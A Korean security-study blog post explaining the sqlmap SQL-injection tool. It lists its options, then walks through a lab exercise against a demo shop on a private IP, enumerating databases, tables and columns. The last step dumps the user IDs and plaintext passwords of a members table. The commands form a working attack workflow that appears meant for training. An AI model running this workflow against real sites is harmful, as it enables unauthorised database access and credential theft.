Jaeseo's Information Security Story

SQLMAP - 사용법 본문

Security Study/Web hacking

SQLMAP - 사용법

Jaeseokim 2019. 10. 15. 17:54

SQLMAP - github Link

  • sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구이다.

대표적 옵션

  • -h, --help
    도움말 출력
  • -u URL, --url=URL
    타켓 URL (e.g. "http://www.site.com/vuln.php?id=1")
  • -g GOOGLEDORK
    Google Dork 검색을 통한 타겟 선정
  • --data=DATA
    POST타입으로 보낼때 데이터 지정 (e.g. "id=1")
  • --cookie=COOKIE
    HTTP Cookie header value 지정 (e.g. "PHPSESSID=a8d127e..")
  • --random-agent
    랜덤한 HTTP User-Agent header value 사용
  • --proxy=PROXY
    PROXY 사용
  • --tor
    익명 tor서버 사용
  • --check-tor
    tor 서버 체크
  • -p TESTPARAMETER
    테스트 가능한 매개변수
  • --level=LEVEL
    테스트 쓰레드 속도 설정 (1-5, default 1)
  • --risk=RISK
    리스크 설정 (1-3, default 1)
  • -a, --all
    모든 것을 검색
  • -b, --banner
    DBMS 배너 확인
  • --current-user
    DBMS user 확인
  • --current-db
    DBMS db 확인
  • --passwords
    DBMS password hash 값 확인
  • --dbs
    Database 확인
  • --tables
    DBMS tables 확인
  • --columns
    DBMS columns 확인
  • --schema
    DBMS schema 확인
  • --dump
    DBMS data 조회
  • --dump-all
    DBMS 내의 모든 data 조회
  • -D DB
    DB 지정
  • -T TBL
    TABLE 지정
  • -C COL
    COLUMN 지정

실습

  1. 데이터베이스 명 추출(--dbs)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 --dbs

결과

available databases [6]:
[*] master
[*] master2
[*] model
[*] msdb
[*] oyesmall
[*] tempdb
  1. 데이터베이스 지정 후 테이블명 추출 (-tables)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 -D "oyesmall" --tables

결과

Database: oyesmall
[28 tables]
+-----------------+
| Comment         |
| MyBox           |
| Statistic       |
| Ve_order        |
| abracadabra     |
| admin_tb        |
| banner          |
| board           |
| category        |
| dtproperties    |
| goods           |
| juke            |
| members         |
| my_juke         |
| notice          |
| order_man       |
| paper           |
| poll            |
| poll_tail       |
| post2           |
| redmaster_login |
| sell_man        |
| seller          |
| shop_cart       |
| t_jiaozhu       |
| tbl_temp        |
| visit           |
| zipcode_2006_v3 |
+-----------------+
  1. 데이터베이스 및 테이블명 지정 후 컬럼명 추출 (-columns)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 -D "oyesmall" -T "members" --columns

결과

Database: oyesmall
Table: members
[33 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| address     | varchar  |
| birth_dd    | varchar  |
| birth_gbn   | varchar  |
| birth_mm    | varchar  |
| birth_yy    | varchar  |
| editdate    | datetime |
| email       | varchar  |
| hp1         | varchar  |
| hp2         | varchar  |
| hp3         | varchar  |
| ismarry     | varchar  |
| job         | varchar  |
| jumin1      | varchar  |
| jumin2      | varchar  |
| mail_flag   | varchar  |
| name        | varchar  |
| num         | int      |
| passwd      | varchar  |
| passwd1     | varchar  |
| passwd_a    | varchar  |
| passwd_q    | varchar  |
| point       | varchar  |
| postdate    | datetime |
| receiveType | varchar  |
| tel1_1      | varchar  |
| tel1_2      | varchar  |
| tel1_3      | varchar  |
| tel2_1      | varchar  |
| tel2_2      | varchar  |
| tel2_3      | varchar  |
| user_id     | varchar  |
| whereTel1   | varchar  |
| whereTel2   | varchar  |
+-------------+----------+
  1. 테이터베이스, 테이블, 컬럼명 지정 후 레코드값 추출 (--dump)
python sqlmap.py -u "http://192.168.0.138:1004/demoshop/shop_board/shop_board_list.asp" --data "page=1&v_num=352" -p v_num --level=3 -D "oyesmall" -T "members" -C "user_id,passwd" --dump

결과

Database: oyesmall
Table: members
[10 entries]
+-----------+----------+
| user_id   | passwd   |
+-----------+----------+
| oyes      | 1234     |
| bisang2da | kisec123 |
| kisec     | kisec    |
| kisectest | kisec    |
| rnrneks   | 55555    |
| ssam      | dlalrud  |
| bazzi     | 12345    |
| mariz     | 12341234 |
| idol      | idol     |
| whoami    | 1q2w3e4r |
+-----------+----------+
Comments